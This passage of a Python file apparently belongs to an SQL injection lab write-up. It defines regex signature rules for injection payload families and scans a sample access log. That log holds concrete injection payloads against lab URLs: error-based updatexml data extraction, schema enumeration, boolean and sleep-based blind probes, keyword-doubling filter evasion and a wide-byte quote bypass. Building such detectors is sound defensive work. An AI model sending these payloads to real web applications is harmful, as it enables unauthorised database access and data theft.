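# Signature rules, one per payload family seen in the levels above (names assumed for this example).
RULES = [
    ("error-based-xml", re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I)),
    ("schema-enum",     re.compile(r"information_schema\.(?:tables|columns|schemata)", re.I)),
    ("boolean-probe",   re.compile(r"\b(?:length|substr|ascii)\s*\(.*?\)\s*=\s*['\d]", re.I)),
    ("time-based",      re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),
    ("double-keyword",  re.compile(r"an(?:and)+d|o(?:or)+r", re.I)),
    ("wide-byte",       re.compile(r"%df(?:%27|')", re.I)),
    ("quote-closure",   re.compile(r"['\"]\s*(?:\)\s*)*(?:\|\||or|and)\b", re.I)),
]
RAW_RULES = {"wide-byte"}  # must see the percent-encoding, not its decoded form


def classify(request_line):
    """Return the names of the rules that fire on one access-log request line."""
    decoded = unquote(request_line)
    hits = []
    for name, rx in RULES:
        target = request_line if name in RAW_RULES else decoded
        if rx.search(target):
            hits.append(name)
    return hits


def scan(lines):
    """Map each flagged line to its rule hits; clean lines are left out."""
    flagged = {}
    for line in lines:
        hits = classify(line)
        if hits:
            flagged[line] = hits
    return flagged


# Constructed request lines that reuse the payload shapes shown in the levels above.
SAMPLE_LOG = [
    "GET /Less-1/?id=1 HTTP/1.1",
    "GET /Less-1/?id=' and updatexml(0x01,concat(0x7e,database(),0x7e),0x01)%23 HTTP/1.1",
    "GET /Less-1/?id=%27%20and%20updatexml(0x01,concat(0x7e,(select%20group_concat(table_name)%20from%20"
    "information_schema.tables%20where%20table_schema%20=%20%27security%27),0x7e),0x01)%23 HTTP/1.1",
    "GET /Less-7/?id=1%27))%20and%20(select%20length(database()))%20=8%20%23 HTTP/1.1",
    "GET /Less-9/?id=1' and (select sleep(10)) %23 HTTP/1.1",
    "GET /Less-25/?id=1' anandd updatexml(1,concat(0x7e,database(),0x7e),1)%23 HTTP/1.1",
    "GET /Less-32/?id=%df' or 1=1 %23 HTTP/1.1",
]


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOG).items():
        print(", ".join(hits), "<-", line)
```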